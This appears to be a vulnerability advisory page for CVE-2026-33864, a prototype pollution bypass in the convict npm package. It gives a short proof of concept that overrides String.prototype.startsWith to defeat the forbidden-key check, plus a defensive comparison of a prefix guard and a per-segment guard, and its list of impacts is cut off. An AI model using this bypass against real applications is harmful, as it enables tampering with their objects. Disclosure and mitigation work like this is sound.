CVE-2026-33864 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.
The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js, where the startsWith() function is used to check whether user-provided input contains forbidden strings.
Steps to reproduce (after installing with npm install or cloning from git):

String.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred
Expected behavior: prototype pollution should be prevented and {} should not gain new properties. The console output should be:
undefined
undefined (or an Error should be thrown)

Actual behavior: Object.prototype is polluted. The console output is:
undefined
yes
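As an added illustration (not convict's code; the path setter and both guards are hypothetical stand-ins), the bypass above run against a prefix check of the kind the advisory describes and against a per-segment check that does not depend on a String.prototype method:

```javascript
// Added example, not convict's own code: a minimal dotted-path setter with a
// prefix-style guard (the kind the advisory describes) beside a per-segment guard.
function guardByPrefix(path, _segments) {
  // Relies on String.prototype.startsWith, which the PoC overwrites to return false.
  if (path.startsWith('__proto__') || path.startsWith('constructor.prototype')) {
    throw new Error('forbidden key in path: ' + path);
  }
}

function guardBySegment(_path, segments) {
  // === is an operator, not a prototype method, so a tampered String.prototype cannot disable it.
  for (const s of segments) {
    if (s === '__proto__' || s === 'constructor' || s === 'prototype') {
      throw new Error('forbidden key segment: ' + s);
    }
  }
}

// Walks the path, creating objects as needed. Guard and walk share one segments array.
function setPath(target, path, value, guard) {
  const segments = path.split('.');
  guard(path, segments);
  let cur = target;
  for (let i = 0; i < segments.length - 1; i++) {
    if (cur[segments[i]] === undefined) cur[segments[i]] = {};
    cur = cur[segments[i]]; // on {}, 'constructor' yields Object, 'prototype' yields Object.prototype
  }
  cur[segments[segments.length - 1]] = value;
}

// Reproduces the advisory's bypass against one guard: overwrites startsWith as the
// PoC does, attempts the set, restores the original, and reports the outcome.
function runUnderBypass(guard, key) {
  const original = String.prototype.startsWith;
  String.prototype.startsWith = () => false;
  let threw = false;
  try {
    setPath({}, 'constructor.prototype.' + key, 'yes', guard);
  } catch (e) {
    threw = true;
  } finally {
    String.prototype.startsWith = original;
  }
  const polluted = ({})[key] === 'yes';
  delete Object.prototype[key]; // undo any pollution so the process stays clean
  return { threw, polluted };
}

console.log('prefix guard :', runUnderBypass(guardByPrefix, 'polluted'));  // { threw: false, polluted: true }
console.log('segment guard:', runUnderBypass(guardBySegment, 'polluted')); // { threw: true, polluted: false }
```

Overwriting String.prototype.startsWith already requires running script inside the same process, so the per-segment guard is about not letting the key check depend on a mutable prototype method rather than about stopping a fully untrusted caller.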
This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected.
It could potentially lead to the following problems:
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.